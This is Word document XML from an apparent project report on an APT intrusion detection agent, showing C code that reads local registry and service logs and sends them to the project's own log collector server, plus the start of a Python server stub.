          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">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pComputerName =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AE0062" w:rsidRDefault="00AE0062" w:rsidP="00AE006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pWindowsVersion;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00010AEF" w:rsidRDefault="008847F5" w:rsidP="00010AEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">To distinguish between log data of different computers in network, we decided to store log data in files which use computer </w:t>
      </w:r>
      <w:r w:rsidR="00010AEF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>name and version as file’s name. For example, if the computer name is “P3N3TR4T10N” and its window</w:t>
      </w:r>
      <w:r w:rsidR="003A23CE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>s version is 10.0, the log file will be named “P3N3TR4T10N.</w:t>
      </w:r>
      <w:r w:rsidR="00010AEF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>10.0.log”. Since rarely computer names are duplicated in the same LAN or Domain, this approach helps in distinguish between machines for long term, rather than based on IP address which could easily be changed due to the operation of DHCP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B5278" w:rsidRDefault="00010AEF" w:rsidP="000B5278">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SendLogToServer reads information in “System.info” to get computer name and version. If the file does not exist or contains NULL, APTIDS stops sending that log to DLCH</w:t>
      </w:r>
      <w:r w:rsidR="000B5278">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00594D87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> SendLogToServer calls “ParseData”, a function for getting information between the predefined tag and its appropriate ending tag.</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//Open System Infomatin File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LPCSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> pInfoFile = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Config/System.info"</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hInfoFile = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CreateFileA(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">pInfoFile, </w:t>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0, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>OPEN_EXISTING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 0, 0);</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dwErrorCode = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GetLastError(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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//If file does not exist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(dwErrorCode == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ERROR_FILE_NOT_FOUND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)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L"Cannot open System Information file: ERROR_FILE_NOT_FOUND !\n"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//Read from Info File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pInfoBuffer = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>calloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_BUFFER_LEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">,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CHAR</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dwResult = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ReadFile(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">hInfoFile, pInfoBuffer,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xml:space="preserve">, &amp;dwByteRead,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//Close File Handle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CloseHandle(hInfoFile);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Check weather Config File contains NULL</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(dwByteRead == 0)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L"System Information file contains NULL !\n"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xml:space="preserve">// Getting Computer Name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pComputerName = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ParseData(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">pInfoBuffer, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"&lt;ComputerName&gt;"</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(pComputerName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"Computer Name was not set\n"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Getting Windows Version</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pWindowsVersion = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ParseData(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">pInfoBuffer, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"&lt;WindowsVersion&gt;"</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(pWindowsVersion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"Windows Version was not set\n"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rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00010AEF" w:rsidRDefault="00594D87" w:rsidP="00010AEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">SendLogToServer connects to DLCH, DLCH will return another available port upon any connection. SendLogToServer terminates the previous connection and reconnects to the new received port. That connection now in used for sending log data to DLCH. </w:t>
      </w:r>
      <w:r w:rsidR="00D42607">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>According to type of log data which is specified by APTIDS’</w:t>
      </w:r>
      <w:r w:rsidR="002723A5">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>s modules.</w:t>
      </w:r>
      <w:r w:rsidR="00B81AF2">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> APTIDS firstly send to Server its local Computer Name and Windows </w:t>
      </w:r>
      <w:r w:rsidR="00B81AF2">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Version on the default port for identify itself. Then it sends log data for storing on server using the returned port number.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switch</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LOG_TYPE_REGISTRY</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hRegFile = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CreateFileW(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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L"Logs/tmpRegistry.log"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FILE_SHARE_READ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OPEN_EXISTING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dwErrorCode = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GetLastError(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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(dwErrorCode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ReadFile(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">hRegFile, lpRegBuffer,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&amp;dwRegByteRead,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L"%s\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, lpRegBuffer);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CloseHandle(hRegFile);</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"Error Code: %d\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, dwErrorCode); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// Debug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//Start sending Log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(dwRegByteRead &gt; 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dwByteNeeded = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>WideCharToMultiByte(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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lpRegBuffer,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pRegBuffer,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pRegBuffer = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>calloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>dwByteNeeded, 1);</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WideCharToMultiByte(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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lpRegBuffer,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pRegBuffer,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dwByteNeeded,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"Sending Registry Log to Server: %s \n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, pRegBuffer);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send(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConnectSocket, (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)pRegBuffer, dwByteNeeded,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LOG_TYPE_SERVICE</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hSvcFile = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CreateFileW(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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L"Logs/tmpService.log"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FILE_SHARE_READ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OPEN_EXISTING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t xml:space="preserve">dwErrorCode = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GetLastError(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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(dwErrorCode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ReadFile(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">hSvcFile, lpSvcBuffer,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&amp;dwSvcByteRead,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L"%s\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, lpSvcBuffer);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CloseHandle(hSvcFile);</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"Error Code: %d\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, dwErrorCode); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// Debug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//Start sending Log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(dwSvcByteRead &gt; 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dwByteNeeded = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>WideCharToMultiByte(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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lpSvcBuffer,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pSvcBuffer,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pSvcBuffer = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>calloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>dwByteNeeded, 1);</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WideCharToMultiByte(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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lpSvcBuffer,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pSvcBuffer,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dwByteNeeded,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"%d\n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, dwByteNeeded); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//Debut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"Sending Service Log to Server: %s \n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, pSvcBuffer);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send(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ConnectSocket, (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)pSvcBuffer, dwByteNeeded,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rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00326F1A" w:rsidRDefault="00326F1A">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F1CBF" w:rsidRDefault="00326F1A" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc485303749"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Sentry Forensic Source code</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
      <w:r w:rsidR="006F1CBF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002723A5" w:rsidRDefault="006F1CBF" w:rsidP="00580F86">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="103" w:name="_Toc485303750"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Distributed Log Collector Hardware and Centralized Log Storage System</w:t>
      </w:r>
      <w:bookmarkEnd w:id="103"/>
    </w:p>
    <w:p w:rsidR="006F1CBF" w:rsidRDefault="00EA71C0" w:rsidP="00C973CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="104" w:name="_Toc485303751"/>
      <w:r>
        <w:t>Distributed Log Collector Hardware</w:t>
      </w:r>
      <w:bookmarkEnd w:id="104"/>
    </w:p>
    <w:p w:rsidR="00BA1B83" w:rsidRDefault="00BA1B83" w:rsidP="00BA1B83">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Server’s source code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1B83" w:rsidRDefault="00BA1B83" w:rsidP="00BA1B83">
      <w:r>
        <w:t>DLCH implements a server for receiving connection from APTIDS agent on monitored systems. The server binds to</w:t>
      </w:r>
      <w:r w:rsidR="003A23CE">
        <w:t xml:space="preserve"> a default</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> port</w:t>
      </w:r>
      <w:r w:rsidR="003A23CE">
        <w:t>, which currently set to</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> “55679”</w:t>
      </w:r>
      <w:r w:rsidR="003A23CE">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to receive request from client.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA1B83" w:rsidRDefault="00BA1B83" w:rsidP="00BA1B8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2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Server():</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">while </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA1B83">
        <w:rPr>
